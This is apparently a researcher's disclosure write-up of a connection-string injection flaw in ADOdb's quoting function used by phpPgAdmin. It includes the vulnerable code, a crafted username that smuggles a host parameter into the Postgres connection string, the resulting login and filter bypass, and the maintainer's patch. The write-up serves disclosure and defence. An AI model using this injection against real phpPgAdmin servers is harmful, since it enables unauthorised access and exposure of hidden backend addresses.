I first decided to look at phpPgAdmin after reading this blog post that someone wrote up about abusing it to get a bug bounty. After reading through the source I discovered a bug in the library it was using to interact with Postgres.

When a user logs in the username and password is filtered by this function:

function adodb_addslashes($s)  
{  
   $len = strlen($s);  
   if ($len == 0) return "''";  
   if (strncmp($s,"'",1) === 0 && substr($s,$len-1) == "'") return $s; // already quoted  
 return "'".addslashes($s)."'";  
}

'testinguser' host='1.3.3.7'

and the connection string would become

port=5432 user='testinguser' host='1.3.3.7' password='gfafas' dbname='template1'

This means we can login to our server to get past the login before exploiting other bugs in the phpPgAdmin panel. It can also reveal the backend IP of a server if it is behind caching or DDoS protection.

Another impact of this is that it can be used to bypass weak password filters that phpPgAdmin implemented.

$bad_usernames = array('pgsql', 'postgres', 'root', 'administrator');
$username = strtolower($server_info['username']);  
  
if ($server_info['password'] == '' || in_array($username, $bad_usernames)) {  
   unset($_SESSION['webdbLogin'][$_REQUEST['server']]);  
   $msg = $lang['strlogindisallowed'];  
   include('./login.php');  
   exit;  
}

I also explored adding other options to the postgres connection string but was not able to find anything interesting.

Patching

After reporting the issue on Huntr.dev Damien Regad (one of the ADOdb maintainers) responded and produced a patch. As described in the advisory the simplest patch is removing this line:

if (strncmp($s,"'",1) === 0 && substr($s,$len-1) == "'") return $s; // already quoted 

Coming Soon

We did find more security issues in phpPgAdmin but these are still awaiting a response from them and will be released some time in the future.

Timeline